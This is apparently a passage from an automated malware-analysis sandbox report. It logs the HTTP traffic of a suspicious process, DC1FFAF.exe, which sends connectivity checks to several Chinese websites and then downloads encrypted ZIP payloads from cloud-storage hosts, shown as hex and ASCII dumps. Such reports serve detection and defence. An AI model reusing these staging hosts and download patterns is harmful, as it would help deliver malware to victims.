                                                                                                                                    Aug 6, 2024 10:30:03.022628069 CEST1236INData Raw: ab d6 4b e4 1c 34 3c 08 b7 5a 34 83 ad 41 18 5b 03 c0 16 4a 1e a8 e7 04 72 45 17 bb af 71 19 47 fe 19 99 01 3c 56 ff 89 36 a2 aa 90 a9 73 56 5c 3a 13 99 0c d6 50 b3 6b 6d f2 21 ff 9c 3f 15 15 6c 06 76 b5 a7 28 9a ad 12 7b 67 fd d5 f0 0a 1b 21 85
                                                                                                                                    Data Ascii: K4<Z4A[JrEqG<V6sV\:Pkm!?lv({g!O`n)"p:Z'MR,:Eo@]KLzG4F6skLBuo.AanRi\'?cv+#0i["Xq:{$ &!pE
                                                                                                                                    Aug 6, 2024 10:30:03.022638083 CEST213INData Raw: 9e 91 6a f6 ec 59 68 12 78 c9 9f e6 72 70 a5 87 ad 17 a0 3f a9 50 6f 2d 14 a3 08 14 5e cb 98 87 29 44 91 56 5d 33 d3 ac 7b 37 af 07 82 39 e5 35 c2 5e 4e a9 08 90 66 1f ca 12 b1 d6 4d e1 44 1b 29 d0 81 72 e5 a0 0a 66 a9 dc 48 5e 78 f1 78 44 87 d4
                                                                                                                                    Data Ascii: jYhxrp?Po-^)DV]3{795^NfMD)rfH^xxDo\W{R4)]N@[s/1yE<G!g>5Qa01$Uj# wa9DQ%un)1~i
                                                                                                                                    Aug 6, 2024 10:30:03.022648096 CEST1236INData Raw: 78 b6 10 de cb 61 f4 38 97 9e cd b3 01 fe e9 b6 64 5a f2 1e c6 ea 3b 86 8b 88 e2 35 e4 a8 12 3c 8b 00 45 c1 21 d4 7a 2c 29 44 57 30 1f 1f f3 ed cb 70 23 28 5f 61 3e 59 c4 a3 71 36 5a 6e e8 aa c8 69 86 17 6f 1f c3 a5 9d 70 0b 3a 36 80 0b 69 f9 8e
                                                                                                                                    Data Ascii: xa8dZ;5<E!z,)DW0p#(_a>Yq6Zniop:6iZN/#q,fqcy<jG$^-DyS@JOt[n`+./(K!Hj~sm7In24s@}xp[pUi{mN;)rfeUfXk"2[<8
                                                                                                                                    Aug 6, 2024 10:30:03.022660017 CEST1236INData Raw: 55 90 bf e0 3e 42 73 cf 34 5d 9e 2d 29 0e 0d e9 12 7b 6c 11 dd b9 78 23 cc bc 2c 3d aa 45 a6 9f 3d a0 d9 fe 39 91 09 75 1f 78 2f ba 64 dd 97 f6 ed 03 05 9e 8a 01 19 81 e1 b2 71 75 bd 66 d8 c3 84 0a c1 5d 64 e1 8f e0 9e 21 5f c7 d4 8f 1e d3 f5 51
                                                                                                                                    Data Ascii: U>Bs4]-){lx#,=E=9ux/dquf]d!_Q N^pP`[_GB8/yN6sAr%)ArUD"z!H!m(O&P/->/U1@wV`Hy/'tpYREN^*Y`K
                                                                                                                                    Aug 6, 2024 10:30:03.027823925 CEST1236INData Raw: 2b 4e 4b 69 8f 1a eb d8 22 27 53 e5 e5 2a f5 59 ad 95 48 4d b5 35 ea ce b4 03 ca 7e 60 70 30 dd 35 ed b8 eb 2f d5 5c 57 5b 2d ef 4a 15 9f 12 5b f0 86 04 13 1e 66 3b 83 38 9f 22 da 7c 8c bd 6d e9 70 8c 95 3d 64 ee c6 22 07 b1 9c af a7 8c 4b 74 e6
                                                                                                                                    Data Ascii: +NKi"'S*YHM5~`p05/\W[-J[f;8"|mp=d"Ktl4q2,F?@`0HsPO9,/b| 'Did:bf%ZF)M@c8jvS7m]/he{y]Jy%


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    43192.168.2.649769163.181.92.23280420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.789581060 CEST223OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.eastmoney.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.438014984 CEST544INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: Tuser
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 262
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.eastmoney.com/
                                                                                                                                    Via: ens-cache1.de5[,0]
                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                    EagleId: a3b55c9517229330023497033e
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 68 61 73 20 62 65 65 6e 20 61 73 73 69 67 6e 65 64 20 61 20 6e 65 77 20 70 65 72 6d 61 6e 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>301 Moved Permanently</h1><p>The requested resource has been assigned a new permanent URI.</p><hr/>Powered by Tuser</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    44192.168.2.64977047.94.225.22180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.818819046 CEST220OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.jmw.com.cn
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:03.451560974 CEST367INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: nginx/1.26.0
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:03 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 169
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.jmw.com.cn/
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.26.0</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    45192.168.2.64977143.159.118.23880420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.851536036 CEST221OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.tencent.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.298433065 CEST195INHTTP/1.1 302 Found
                                                                                                                                    Location: https://www.tencent.com/
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: EdgeOne_SS_OC
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    EO-LOG-UUID: 2346576881320356262


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    46192.168.2.649772113.219.142.3580420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:02.217871904 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.cdstm.cn
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:03.224100113 CEST464INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: JSP3/2.0.14
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:03 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 144
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.cdstm.cn/
                                                                                                                                    X-Cache-Status: MISS
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Strict-Transport-Security: max-age=63072000;includeSubdomains;preload
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4a 53 50 33 2f 32 2e 30 2e 31 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>JSP3/2.0.14</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    47192.168.2.649773163.171.208.13380420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:02.217957973 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.cctv.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:03.137846947 CEST521INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: Cdn Cache Server V2.0
                                                                                                                                    Location: https://www.cctv.com/
                                                                                                                                    X-Via: 1.0 PSxjpSin5ij130:8 (Cdn Cache Server V2.0)
                                                                                                                                    X-Ws-Request-Id: 66b1df0a_PSxjpSin5df135_28151-17982
                                                                                                                                    Set-Cookie: HMF_CI=a6493a4f3d7d4b2981737055e087c0f34885048e20c619eac1fdf8d31f47f431c716528acb6c4bb1652a6d34a6319ae65dea35d6307b8e9af7aa677000d1dc709b; Expires=Thu, 05-Sep-24 08:30:02 GMT; Path=/


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    48192.168.2.64977443.152.186.11780420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:02.218554974 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.hupu.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.827135086 CEST226INHTTP/1.1 302 Found
                                                                                                                                    Location: https://www.hupu.com/
                                                                                                                                    Content-Length: 0
                                                                                                                                    X-NWS-LOG-UUID: 8202137064869430976
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: Lego Server
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    X-Cache-Lookup: Return Directly


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    49192.168.2.649775161.117.242.9380420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:02.474078894 CEST263OUTGET /2024-08-06/16_27 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: zhangjiakoucs.oss-accelerate.aliyuncs.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:03.839942932 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Server: AliyunOSS
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:03 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 1566
                                                                                                                                    Connection: keep-alive
                                                                                                                                    x-oss-request-id: 66B1DF0BC0346B10EEAAA990
                                                                                                                                    Content-Range: bytes 0-1565/1566
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    ETag: "ECB5B3E13C02F7516555E7450F48E552"
                                                                                                                                    Last-Modified: Tue, 06 Aug 2024 08:27:08 GMT
                                                                                                                                    x-oss-object-type: Normal
                                                                                                                                    x-oss-hash-crc64ecma: 12250167233259248927
                                                                                                                                    x-oss-storage-class: Standard
                                                                                                                                    Content-MD5: 7LWz4TwC91FlVedFD0jlUg==
                                                                                                                                    x-oss-server-time: 11
                                                                                                                                    Data Raw: 50 4b 03 04 14 00 01 00 08 00 cf ad 05 59 6c d5 e4 fb b4 05 00 00 74 13 00 00 04 00 00 00 63 6c 73 74 21 28 f0 80 94 6f c1 16 5b de e4 9a cf d1 3a 7a fd b6 89 6a df 2d 36 7e d5 2d 87 f8 b8 3e a2 9f 98 3c c9 52 97 7e 5f 64 ee 14 3b ea 3e de 84 0a e6 d5 dd c2 75 35 8e ff 56 80 d2 1d 60 01 11 82 21 86 51 33 03 b4 2a bf 1c cd 81 62 41 64 57 cd ae ee 81 db 82 86 08 32 b1 6d 2d 24 95 89 1e 1b 0b 34 11 fc 34 40 53 ae df f4 2d b5 a3 63 f7 36 85 05 08 6f 7d 52 16 c2 5d 5e aa c8 b0 be f2 4c 60 de c7 f5 e2 21 74 ea 55 85 e7 0a 9f b7 e4 34 f3 dc 3a 72 fd 26 c6 16 49 3d 5e 63 86 75 7f 60 2c d4 52 68 c3 dd e7 e9 b1 4a d4 64 19 61 fb cb 26 98 1d 09 14 a2 89 a8 df 3f 55 6b d2 cc 17 ce e5 88 e6 15 ba bf ba 0e 3d 1b 92 1a 0e 4c 89 56 c5 a0 17 64 3a 3a f7 90 dc 3e 1f f9 66 62 e1 9b b8 af ee 7f b0 c9 87 0d 4c 33 35 37 15 7d b3 bc 25 2b e0 ed c1 a7 5e 19 b4 06 e3 a6 40 29 e7 b4 07 78 81 8a d8 e2 f3 0a e9 28 d9 f2 64 ba de 15 14 18 46 a4 bf 9e 4f c4 7e 65 5b e5 14 2b 4b 8a 44 a1 11 43 9a bc 8e aa 97 19 74 41 f5 79 5d f0 [TRUNCATED]
                                                                                                                                    Data Ascii: PKYltclst!(o[:zj-6~-><R~_d;>u5V`!Q3*bAdW2m-$44@S-c6o}R]^L`!tU4:r&I=^cu`,RhJda&?Uk=LVd::>fbL357}%+^@)x(dFO~e[+KDCtAy]H q28,|<8K=GAEEyv-.!FryLRW?x# I::6\!D+.x%4!YEQX9pFlaLb0c;cg5A7/l:7rcW`AnI(T=ttG4'Pw2jLY|"\sH.{ZQUo1EEBa,;WOAw,r5fU('m?zqV_}v@1m7U,]E^{[_oyUTL6\u(ji`9
                                                                                                                                    Aug 6, 2024 10:30:03.839962959 CEST856INData Raw: 80 7e 33 70 02 e9 6f d6 db b5 15 2c 19 76 61 8d ca 3b 8e 67 85 0c aa 40 28 98 d3 f3 09 f4 c5 cf 97 79 46 c1 21 3f a4 0c fc d7 a0 dd c9 5b e8 d2 02 8e e2 9f 1f 5f 38 79 a9 f6 32 b6 9d 9f 6c e9 8b 94 69 8a 66 80 d5 82 97 8a 57 e5 49 95 2d 8b cf 06
                                                                                                                                    Data Ascii: ~3po,va;g@(yF!?[_8y2lifWI-b[M0^pu<F'7Wl%Y|&4Q"Mp~F6Sk{>n2CLR0nGxYgkL~:<{}i8F:~V?N[`I


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    50192.168.2.64977627.221.16.14980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:04.394711971 CEST232OUTGET /operate/24624 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: sinacloud.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:05.752624989 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 1203628
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-RequestId: 00cd0b8c-2408-0616-3005-0894eff95fc8
                                                                                                                                    X-Requester: GRPS000000ANONYMOUSE
                                                                                                                                    Last-Modified: Tue, 06 Aug 2024 08:14:44 GMT
                                                                                                                                    X-Filesize: 1203628
                                                                                                                                    ETag: "608c268fcced29d7b47cf80a29ab6d38"
                                                                                                                                    x-amz-meta-crc32: 92F2C6C7
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    Access-Control-Allow-Headers: Origin, Content-Type, Accept, Range, Content-Length
                                                                                                                                    Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS, HEAD
                                                                                                                                    Access-Control-Max-Age: 31536000
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Content-Range: bytes 0-1203627/1203628
                                                                                                                                    Data Raw: 50 4b 03 04 14 00 01 00 08 00 cf 81 06 59 03 1b bf f6 3a 5d 12 00 c8 de 12 00 08 00 00 00 42 36 34 64 2e 72 61 72 40 6e f1 89 2f a8 19 6b 8a e6 28 02 81 ce d4 ef c3 89 21 f5 ee 6c 5f f2 8b ad ab 5b 23 87 32 82 2a 47 bc 18 0b e7 99 5f d4 8d 5b fe 17 57 ab da 87 46 60 c4 98 64 e0 d7 3c 60 e0 2c 16 95 c8 d0 d5 3b b5 92 17 56 66 30 dc 36 71 bb 2c ae 11 01 ce 9e 5b 3b e9 99 71 86 87 4a a5 d7 4f a0 ce 5b b5 c8 70 20 61 fd ce 2d dd 63 b3 64 0a 1b c4 6d f4 ca 45 57 7d 19 af 7d ba 7e 96 9f 4c fb ba 8c 99 02 aa 93 8b e6 7c b0 45 ff 38 85 1b 44 68 d3 58 44 34 b8 d6 90 11 79 bd bc d7 5d 47 2a 97 43 a6 79 05 9a 2e 69 60 c9 56 64 ef 4b c5 af 59 38 70 da 1e 8a b6 7e 3b 21 4c 40 53 07 ac cd 72 9d f1 07 00 f2 4b 50 71 1a 7d 3c 03 00 d1 92 65 26 63 81 6e 9b e5 50 80 49 9e f3 af 22 66 02 61 65 29 af dc 1a 9d e8 7e cb bb 32 83 90 8f e6 6a 27 67 8b 0c f1 8f a7 2c d2 68 14 9d d8 00 2f bb f7 0a 8c 90 5e c9 e0 72 0f 40 64 b9 62 c1 6f 62 55 63 84 b8 f2 13 4d 5a 60 2c 49 d5 19 03 af 27 87 11 ae ea 7d 8d d0 19 6d 12 aa f9 91 [TRUNCATED]
                                                                                                                                    Data Ascii: PKY:]B64d.rar@n/k(!l_[#2*G_[WF`d<`,;Vf06q,[;qJO[p a-cdmEW}}~L|E8DhXD4y]G*Cy.i`VdKY8p~;!L@SrKPq}<e&cnPI"fae)~2j'g,h/^r@dbobUcMZ`,I'}mHu$GGqfKgXX[&,.qLc=VA'zlkmULl7HClEE(wJwLyWKwA@5EZSx-})N`)D{y5rS/V.DAer#Mg&A7iA]eNyE6,W9Lm?C
                                                                                                                                    Aug 6, 2024 10:30:05.752639055 CEST224INData Raw: 99 16 54 52 35 be 4e 68 ce 0f 2d 4e 64 d0 de 6c 32 6f f4 05 1d 2f fa 81 50 0e e3 2d c3 2b 9a 1e f3 5c b2 98 5b 0a e6 64 f6 d8 53 00 e7 8a 6a 68 06 aa 30 02 e7 a6 b2 79 c0 3e 9b 2d f4 85 9a 41 a7 1a 73 1f 1d ba 65 84 d6 01 0d e6 7d 2e 6a 86 9b 3b
                                                                                                                                    Data Ascii: TR5Nh-Ndl2o/P-+\[dSjh0y>-Ase}.j;=_8~ZuM{{ 1mZ,6%M.xYcXw"!_-Ikx8kZ{rJ,L=4`bt;b%}bX8Y*2sD
                                                                                                                                    Aug 6, 2024 10:30:05.752655983 CEST1236INData Raw: 3c 46 d5 8a 31 16 e7 41 f2 d5 a0 ec 29 c5 05 0b b2 77 ed b4 a9 8e 91 43 f9 4f 84 e4 14 05 c0 61 a3 8d 54 bc ab bc 3a d2 78 3e 13 c1 8d ee 63 c5 1a 3d 9b b4 ad a3 39 75 ef b7 e0 40 41 5f db 9e a8 63 a9 b2 3b 19 b8 e9 61 24 ae f1 7f ca 59 a2 98 04
                                                                                                                                    Data Ascii: <F1A)wCOaT:x>c=9u@A_c;a$Y/|~5ApJaXU4(v$a(Q6sMYL@5e"m#9lQi-xZ+H$'+*Bwelz4Oa"zSM?uis6r"*!?
                                                                                                                                    Aug 6, 2024 10:30:05.752666950 CEST1236INData Raw: 88 eb 18 20 3d 20 17 03 9b e8 06 90 80 71 1f 32 c4 43 4b f7 6c 85 3e b1 09 7c 81 6a c3 61 ad 00 d3 00 37 d4 a6 c9 d6 da 40 78 09 34 f3 72 91 fd 30 cd a4 2d df b3 c8 40 c6 f1 a4 91 0d b2 4c 35 11 27 f1 d8 3c 33 a3 b6 71 76 f1 12 f8 a9 f7 20 31 60
                                                                                                                                    Data Ascii: = q2CKl>|ja7@x4r0-@L5'<3qv 1`MMaNGj:vh!pq)fJ`1w76'DMTFuPva&~Z#n{F4N=>Wd[xsvL)~?(^R+,%$;=)a+_TCRTgtd
                                                                                                                                    Aug 6, 2024 10:30:05.752676964 CEST1236INData Raw: e5 a5 d9 02 15 b7 e6 89 83 c6 25 af 8b 79 5e 87 f0 aa 53 c7 d7 88 24 df 44 4d 4a ac d0 f8 53 e9 2a d8 d8 96 39 06 35 cf b1 9b af 14 51 dd b3 2f 38 07 18 69 5b b1 7c 0f 1a 4f ab e3 97 34 74 17 05 45 85 64 21 a7 35 5d fa 21 db bc 5b 8d e3 5d b5 7f
                                                                                                                                    Data Ascii: %y^S$DMJS*95Q/8i[|O4tEd!5]![]Ku~k%NvZf5O'S#E:Q!AZJiSq./0;c~`=MPX,`kjyu0?o7y=(4ko0_XqUI
                                                                                                                                    Aug 6, 2024 10:30:05.752687931 CEST1236INData Raw: 32 e4 26 7b ca 4c 2d e9 92 e1 39 d0 88 b5 02 4b 92 ac 49 6a c8 22 1e 50 71 80 af cd cd 67 a4 30 09 2f 64 d1 26 0b 23 17 8f 45 4d 34 83 ee 34 76 9c 3a cf 20 3a d1 6c 5c 46 20 90 0a f6 41 e2 5d c3 cc 93 ab b5 d2 78 0f 14 e5 f8 84 ce 29 bd 02 71 b3
                                                                                                                                    Data Ascii: 2&{L-9KIj"Pqg0/d&#EM44v: :l\F A]x)qVT!>)DdNFH1aRZVh3V+bp"}\XPJ/RbmQ_Ib3X:n8lLeT]WT
                                                                                                                                    Aug 6, 2024 10:30:05.752703905 CEST1236INData Raw: d9 5a 0d 18 ca e0 83 0c 90 4a 51 66 e9 73 e4 2d 3f e9 05 43 b5 3c 0d 00 b4 46 0f df b3 0f 5f 27 e2 08 57 a9 c7 f4 a9 fa 82 a5 6e f7 fb 6c 36 ba 41 11 53 69 91 2e 56 3f 38 c6 d2 fc fe 6c 2b 01 68 62 1a 37 03 61 a5 7e 2b 15 a8 5f 53 4d 5b 7b f9 99
                                                                                                                                    Data Ascii: ZJQfs-?C<F_'Wnl6ASi.V?8l+hb7a~+_SM[{*S;6/MQLPubM!4<w%"dDc'h%fsW}ZWH%S_or:ofaO5]xJ5oj~Cm;K":!zlA:/3S&o6o
                                                                                                                                    Aug 6, 2024 10:30:05.752715111 CEST1236INData Raw: e7 79 fc 17 61 39 dc 44 bc b4 4e 8e 2f 08 73 27 27 b1 5c 13 3b 61 73 8f a0 08 a9 ab 45 41 6c ae 18 4c 28 e3 de bb 26 ad 6a 7d c0 bc 85 82 b5 d9 3f 26 9a 49 cc 26 f1 25 0d 59 3c 9a 1f e5 8b 5b 7a ec 14 31 af 25 98 3b 0c a0 9f 85 e3 8b ab 13 35 e5
                                                                                                                                    Data Ascii: ya9DN/s''\;asEAlL(&j}?&I&%Y<[z1%;5\vzjIPSp'"grA:WE45FQd}#|R>.bn+'W3s(mx|rHlz.HHnr%I jmZC
                                                                                                                                    Aug 6, 2024 10:30:05.752724886 CEST1236INData Raw: d3 de 76 6d 68 be 63 e2 78 0d 76 1e 03 26 3b 23 71 34 f2 0d 60 ee 99 b6 2f 09 5d 14 a1 e8 98 83 5d 0a 6a e3 0b c5 3b 5b de 1c 08 46 c0 75 07 d7 51 82 02 d1 a3 8d 9c bc 30 f6 f5 ee c6 ec 5a 23 cb 7e bc ac 3b f4 6d f2 8e 3c 29 7c ff 27 93 f6 4a a1
                                                                                                                                    Data Ascii: vmhcxv&;#q4`/]]j;[FuQ0Z#~;m<)|'J|.Bwa8st+/VWW j/QG97z^<pm\Z(9S)?\k"|nxYGoAk n\?wx!\i~g
                                                                                                                                    Aug 6, 2024 10:30:05.752737045 CEST1236INData Raw: 48 ab cf 21 2f 34 99 ae 59 f8 4f 22 7e a8 c5 b6 99 06 0f e7 1e 88 03 b7 da 3e 72 26 df 45 3e 05 5e 23 34 78 85 70 77 10 29 66 2a 59 33 18 06 b4 b2 ab 38 33 79 53 4e ab e0 78 e9 2c 4c 12 82 cb b6 65 89 4a 9b a6 03 f6 68 df 0d 32 5f ab 47 fc 95 18
                                                                                                                                    Data Ascii: H!/4YO"~>r&E>^#4xpw)f*Y383ySNx,LeJh2_Go6V{b?V3e9BFN")RNp-w9>s|'fmrie}eqYNB+OT(G&ax|:$ePqO]J1@<958u<
                                                                                                                                    Aug 6, 2024 10:30:05.757834911 CEST1236INData Raw: 52 24 cf 74 2a 2e 01 2c d0 ff 74 ec 55 fe 2e 80 ce 52 fc f1 9c d6 bf 26 52 34 ba 21 5e cd d0 11 df 5a c9 1a f9 df e5 f6 c3 8d 72 86 ca d6 b9 93 b1 29 11 79 ee a8 dc a6 12 58 58 c9 19 95 3c 5a 02 81 0b f3 77 a1 ec 0c 48 62 ad 8e 77 61 a3 9e b0 5a
                                                                                                                                    Data Ascii: R$t*.,tU.R&R4!^Zr)yXX<ZwHbwaZn-SM:G^yLwCp`9OoAdE'@a3PH)j#|v9T6}owxK#@(%?0TqH.=3.:e[3/Gr2


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    51192.168.2.64977727.221.16.17980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:16.100404024 CEST232OUTGET /operate/24624 HTTP/1.1
